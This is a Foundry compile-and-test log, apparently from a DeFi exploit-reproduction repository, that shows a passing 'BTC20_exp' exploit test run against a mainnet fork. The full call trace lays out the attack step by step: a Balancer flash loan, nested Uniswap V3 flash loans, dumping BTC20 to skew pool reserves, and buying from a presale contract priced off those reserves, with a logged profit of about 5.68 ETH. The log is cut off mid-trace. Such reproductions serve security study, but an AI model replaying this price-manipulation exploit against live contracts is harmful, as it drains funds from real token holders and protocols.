Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.30s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-08/BTC20_exp.sol:18:5:
   |
18 |     IWETH WETH = IWETH(payable(address(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2)));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-08/BTC20_exp.sol:61:9:
   |
61 |         bytes memory userData
   |         ^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-08/BTC20_exp.sol:87:37:
   |
87 |     function uniswapV3FlashCallback(uint256 _amount0, uint256 _amount1, bytes calldata data) external {
   |                                     ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-08/BTC20_exp.sol:87:55:
   |
87 |     function uniswapV3FlashCallback(uint256 _amount0, uint256 _amount1, bytes calldata data) external {
   |                                                       ^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 639.44ms (2.05ms CPU time)

Ran 1 test for src/test/2023-08/BTC20_exp.sol:ContractTest
[PASS] testExploit() (gas: 650996)
Logs:
  Before Start: 0 ETH
  Attack Exploit: 5.684731200402649461 ETH

Traces:
  [298756] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 17949214 [1.794e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(BTC20: [0xE86DF1970055e9CaEe93Dae9B7D5fD71595d0e18], "BTC20")
    │   └─ ← [Return]
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(SDEX: [0x5DE8ab7E27f6E7A1fFf3E5B337584Aa43961BEeF], "SDEX")
    │   └─ ← [Return]
    ├─ [0] VM::label(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], "Balancer")
    │   └─ ← [Return]
    ├─ [0] VM::label(SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385], "SDEX_BTC20_Pair3")
    │   └─ ← [Return]
    ├─ [0] VM::label(BTC20_WETH_Pair3: [0x7234c91bd835a6Ed108c8e986E0663B14F9DE14e], "BTC20_WETH_Pair3")
    │   └─ ← [Return]
    ├─ [0] VM::label(uniRouter: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], "uniRouter")
    │   └─ ← [Return]
    ├─ [0] VM::label(BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A], "BTC20_WETH_Pair2")
    │   └─ ← [Return]
    ├─ [24603] SDEX::approve(SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [24603] SDEX::approve(0xE592427A0AEce92De3Edee1F18E0157C05861564, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xE592427A0AEce92De3Edee1F18E0157C05861564, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [25272] BTC20::approve(SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [25272] BTC20::approve(BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [25272] BTC20::approve(BTC20_WETH_Pair3: [0x7234c91bd835a6Ed108c8e986E0663B14F9DE14e], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: BTC20_WETH_Pair3: [0x7234c91bd835a6Ed108c8e986E0663B14F9DE14e], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [25272] BTC20::approve(uniRouter: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: uniRouter: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [25272] BTC20::approve(0xE592427A0AEce92De3Edee1F18E0157C05861564, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xE592427A0AEce92De3Edee1F18E0157C05861564, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [24420] WETH::approve(uniRouter: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: uniRouter: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [25272] BTC20::approve(0x1F006F43f57C45Ceb3659E543352b4FAe4662dF7, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x1F006F43f57C45Ceb3659E543352b4FAe4662dF7, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [24420] WETH::approve(0x1F006F43f57C45Ceb3659E543352b4FAe4662dF7, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x1F006F43f57C45Ceb3659E543352b4FAe4662dF7, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    └─ ← [Stop]

  [733096] ContractTest::testExploit()
    ├─ [2534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] console::log("Before Start: %d ETH", 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [707529] Balancer::flashLoan(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [300000000000000000000 [3e20]], 0x)
    │   ├─ [2534] WETH::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 68806375619580487410091 [6.88e22]
    │   ├─ [2350] 0xce88686553686DA562CE7Cea497CE749DA109f9F::getFlashLoanFeePercentage() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [25962] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 300000000000000000000 [3e20])
    │   │   ├─ emit Transfer(from: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 300000000000000000000 [3e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000001043561a8829300000
    │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x000000000000000000000000000000000000000000000e920047da34d8fa21ab → 0x000000000000000000000000000000000000000000000e81bcf1bfacafca21ab
    │   │   └─ ← [Return] true
    │   ├─ [658220] ContractTest::receiveFlashLoan([0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [300000000000000000000 [3e20]], [0], 0x)
    │   │   ├─ [430864] SDEX_BTC20_Pair3::flash(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 76301042059171907852637 [7.63e22], 0x00000000000000000000000000000000000000000000102849abd491f931595d)
    │   │   │   ├─ [2539] SDEX::balanceOf(SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385]) [staticcall]
    │   │   │   │   └─ ← [Return] 1348723216560827653503193 [1.348e24]
    │   │   │   ├─ [2930] BTC20::balanceOf(SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385]) [staticcall]
    │   │   │   │   └─ ← [Return] 77071759655729199851149 [7.707e22]
    │   │   │   ├─ [28627] BTC20::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 76301042059171907852637 [7.63e22])
    │   │   │   │   ├─ emit Transfer(from: SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 76301042059171907852637 [7.63e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000102849abd491f931595d
    │   │   │   │   │   @ 0xb80a4a6f316d25108ca734efbfa7bbfe63a558e20d520dcbd5ccf677206b709a: 0x0000000000000000000000000000000000000000000010521186c733c568268d → 0x000000000000000000000000000000000000000000000029c7daf2a1cc36cd30
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [368070] ContractTest::uniswapV3FlashCallback(0, 763010420591719078527 [7.63e20], 0x00000000000000000000000000000000000000000000102849abd491f931595d)
    │   │   │   │   ├─ [317436] BTC20_WETH_Pair3::flash(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 47676018750296374476872 [4.767e22], 0x000000000000000000000000000000000000000000000a1885abf70576458048)
    │   │   │   │   │   ├─ [2534] WETH::balanceOf(BTC20_WETH_Pair3: [0x7234c91bd835a6Ed108c8e986E0663B14F9DE14e]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2330602740225707965 [2.33e18]
    │   │   │   │   │   ├─ [2930] BTC20::balanceOf(BTC20_WETH_Pair3: [0x7234c91bd835a6Ed108c8e986E0663B14F9DE14e]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 48157594697269065128154 [4.815e22]
    │   │   │   │   │   ├─ [6727] BTC20::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 47676018750296374476872 [4.767e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: BTC20_WETH_Pair3: [0x7234c91bd835a6Ed108c8e986E0663B14F9DE14e], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 47676018750296374476872 [4.767e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000102849abd491f931595d → 0x000000000000000000000000000000000000000000001a40cf57cb976f76d9a5
    │   │   │   │   │   │   │   @ 0xd4915abfd7c644b3b84dad9d8bdf3a82df5587deae7bc6b9047d17410a4786d9: 0x000000000000000000000000000000000000000000000a32a0e16b4b55d998da → 0x00000000000000000000000000000000000000000000001a1b357445df941892
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [281552] ContractTest::uniswapV3FlashCallback(0, 476760187502963744769 [4.767e20], 0x000000000000000000000000000000000000000000000a1885abf70576458048)
    │   │   │   │   │   │   ├─ [930] BTC20::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 123977060809468282329509 [1.239e23]
    │   │   │   │   │   │   ├─ [70207] uniRouter::swapExactTokensForTokens(123977060809468282329509 [1.239e23], 0, [0xE86DF1970055e9CaEe93Dae9B7D5fD71595d0e18, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   ├─ [2504] BTC20_WETH_Pair2::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 66567059340841615084 [6.656e19], 86892067656927565101331 [8.689e22], 1692452795 [1.692e9]
    │   │   │   │   │   │   │   ├─ [16535] BTC20::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A], 123977060809468282329509 [1.239e23])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A], value: 123977060809468282329509 [1.239e23])
    │   │   │   │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: uniRouter: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640563915480523198444847310426 [1.157e77])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xbea5b04db1b78cf192261e74182d61f2109de26dab2d36535c635a97c54b15f2: 0x0000000000000000000000000000000000000000000012666dad5812084cb913 → 0x000000000000000000000000000000000000000000002ca73d0523a977c392b8
    │   │   │   │   │   │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffe5bf30a834689089265a
    │   │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000001a40cf57cb976f76d9a5 → 0
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [40849] BTC20_WETH_Pair2::swap(39088548944505461782 [3.908e19], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   │   │   │   ├─ [8062] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 39088548944505461782 [3.908e19])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 39088548944505461782 [3.908e19])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000001043561a8829300000 → 0x00000000000000000000000000000000000000000000001261cc86b267e7dc16
    │   │   │   │   │   │   │   │   │   │   @ 0x0f7bdfeaaa6aac90f639b23d473b6781f265b3d20dd2b1c8a4d7470ba48dfe82: 0x0000000000000000000000000000000000000000000000039bcdb3c879367eec → 0x0000000000000000000000000000000000000000000000017d57479e3a7ea2d6
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [534] WETH::balanceOf(BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 27478510396336153302 [2.747e19]
    │   │   │   │   │   │   │   │   ├─ [930] BTC20::balanceOf(BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 210869128466395847430840 [2.108e23]
    │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 27478510396336153302 [2.747e19], reserve1: 210869128466395847430840 [2.108e23])
    │   │   │   │   │   │   │   │   ├─ emit Swap(sender: uniRouter: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 0, amount1In: 123977060809468282329509 [1.239e23], amount0Out: 39088548944505461782 [3.908e19], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 9: 0x000000000000000000000000000033270a77d398e639940e69e8f63c26733b1c → 0x00000000000000000000000000003328b6c7a85f907d581dc76f0316fa3fe7d0
    │   │   │   │   │   │   │   │   │   @ 10: 0x000000000000000000000000000000000337a171aafaa79aa546ff9a5573b5f8 → 0x000000000000000000000000000000000337b1eb01a0553fe260f77ec7992c08
    │   │   │   │   │   │   │   │   │   @ 8: 0x64e0c7bb0000000012666dad5812084cb9130000000000039bcdb3c879367eec → 0x64e0c80f000000002ca73d0523a977c392b80000000000017d57479e3a7ea2d6
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   └─ ← [Return] [123977060809468282329509 [1.239e23], 39088548944505461782 [3.908e19]]
    │   │   │   │   │   │   ├─ [9680] 0x1F006F43f57C45Ceb3659E543352b4FAe4662dF7::directTotalTokensSold() [staticcall]
    │   │   │   │   │   │   │   ├─ [2364] 0xDb0618E0B850CAb3F756d030398bE22929226d5c::directTotalTokensSold() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 37484 [3.748e4]
    │   │   │   │   │   │   │   └─ ← [Return] 37484 [3.748e4]
    │   │   │   │   │   │   ├─ [3246] 0x1F006F43f57C45Ceb3659E543352b4FAe4662dF7::maxTokensToSell() [staticcall]
    │   │   │   │   │   │   │   ├─ [2430] 0xDb0618E0B850CAb3F756d030398bE22929226d5c::maxTokensToSell() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 100000 [1e5]
    │   │   │   │   │   │   │   └─ ← [Return] 100000 [1e5]
    │   │   │   │   │   │   ├─ [81305] 0x1F006F43f57C45Ceb3659E543352b4FAe4662dF7::buyWithEthDynamic{value: 300000000000000000000}(62516 [6.251e4])
    │   │   │   │   │   │   │   ├─ [80486] 0xDb0618E0B850CAb3F756d030398bE22929226d5c::buyWithEthDynamic{value: 300000000000000000000}(62516 [6.251e4]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [4122] uniRouter::getAmountsIn(62516000000000000000000 [6.251e22], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0xE86DF1970055e9CaEe93Dae9B7D5fD71595d0e18]) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [504] BTC20_WETH_Pair2::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 27478510396336153302 [2.747e19], 210869128466395847430840 [2.108e23], 1692452879 [1.692e9]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] [11614285593821339252 [1.161e19], 62516000000000000000000 [6.251e22]]
    │   │   │   │   │   │   │   │   ├─ [0] 0x58178A119781df139307572066D5E74704809861::fallback{value: 12194999873512406214}()
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   ├─ [1647] ContractTest::receive{value: 287805000126487593786}()
    │   │   │   │   │   │   │   │   │   ├─ emit Received(: 0x1F006F43f57C45Ceb3659E543352b4FAe4662dF7, : 287805000126487593786 [2.878e20])
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   ├─ [28627] BTC20::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 62516000000000000000000 [6.251e22])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x1F006F43f57C45Ceb3659E543352b4FAe4662dF7, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 62516000000000000000000 [6.251e22])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0xcca40a3d90116f2ab57ca2a598207188fd75d69578d68a75a36b17cba227ec1e: 0x000000000000000000000000000000000000000000006c23012b24d3e5c23a24 → 0x000000000000000000000000000000000000000000005ee60162ccca95723a24
    │   │   │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000d3cffc8580950500000
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─  emit topic 0: 0x4d8aead3491b7eba4b5c7a65fc17e493b9e63f9e433522fc5f6a85a168fc9d36
    │   │   │   │   │   │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   │   │   │   │        topic 2: 0x000000000000000000000000000000000000000000000000000000000000f434
    │   │   │   │   │   │   │   │   │        topic 3: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000a93d57c5e8a3fcc600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064e0c80f
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 229: 37484 → 100000
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 339088548944505461782 [3.39e20]
    │   │   │   │   │   │   ├─ [31184] uniRouter::swapTokensForExactTokens(48152778937799338221641 [4.815e22], 339088548944505461782 [3.39e20], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0xE86DF1970055e9CaEe93Dae9B7D5fD71595d0e18], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   ├─ [504] BTC20_WETH_Pair2::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 27478510396336153302 [2.747e19], 210869128466395847430840 [2.108e23], 1692452879 [1.692e9]
    │   │   │   │   │   │   │   ├─ [5425] WETH::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A], 8156206089568455506 [8.156e18])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A], value: 8156206089568455506 [8.156e18])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x0f7bdfeaaa6aac90f639b23d473b6781f265b3d20dd2b1c8a4d7470ba48dfe82: 0x0000000000000000000000000000000000000000000000017d57479e3a7ea2d6 → 0x000000000000000000000000000000000000000000000001ee87f1d7d619ae28
    │   │   │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000001261cc86b267e7dc16 → 0x000000000000000000000000000000000000000000000011f09bdc78cc4cd0c4
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [17498] BTC20_WETH_Pair2::swap(0, 48152778937799338221641 [4.815e22], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   │   │   │   ├─ [3927] BTC20::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 48152778937799338221641 [4.815e22])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 48152778937799338221641 [4.815e22])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000d3cffc8580950500000 → 0x00000000000000000000000000000000000000000000176f5dd4bf9ba15de049
    │   │   │   │   │   │   │   │   │   │   @ 0xbea5b04db1b78cf192261e74182d61f2109de26dab2d36535c635a97c54b15f2: 0x000000000000000000000000000000000000000000002ca73d0523a977c392b8 → 0x000000000000000000000000000000000000000000002274def8bc1726b5b26f
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [534] WETH::balanceOf(BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 35634716485904608808 [3.563e19]
    │   │   │   │   │   │   │   │   ├─ [930] BTC20::balanceOf(BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 162716349528596509209199 [1.627e23]
